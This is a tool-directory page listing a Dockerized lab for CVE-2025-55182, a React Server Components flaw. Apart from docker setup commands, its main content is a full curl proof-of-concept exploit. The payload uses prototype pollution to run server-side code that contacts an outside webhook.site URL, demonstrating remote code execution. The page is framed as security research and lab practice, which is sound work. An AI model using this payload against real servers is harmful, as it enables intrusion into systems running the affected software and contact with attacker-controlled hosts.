Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
react-cve-2025-55182-lab — Dockerized lab demonstrating CVE-2025-55182, a React Server Components vulnerability, with a proof-of-concept exploit for security research and testing. | Kitploit
Tools/GitHubGitHub/alexandre-briongos-wavestone/react-cve-2025-55182-lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFLearning & EducationLabs & Practice
GitHubalexandre-briongos-wavestone/react-cve-2025-55182-lab

react-cve-2025-55182-lab

Dockerized lab demonstrating CVE-2025-55182, a React Server Components vulnerability, with a proof-of-concept exploit for security research and testing.

View Repository
39 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Setup:

root@kitploit:~
git clone https://github.com/alexandre-briongos-wavestone/react-cve-2025-55182-lab
root@kitploit:~
cd react-cve-2025-55182-lab
root@kitploit:~
sudo docker build -t react-rsc-lab .
root@kitploit:~
sudo docker run -p 3000:3000 react-rsc-lab

Exploit:

root@kitploit:~
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: localhost:3000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 500' \
    --data-binary $'\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require(\'https\').get(\'https://webhook.site/bf68bcb8-2e7a-4fa8-9108-eb1a796a4ba5\');\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"1\"\x0d\x0a\x0d\x0a\"$@0\"\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad--' \
    $'http://localhost:3000/'

References:

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
Download Tool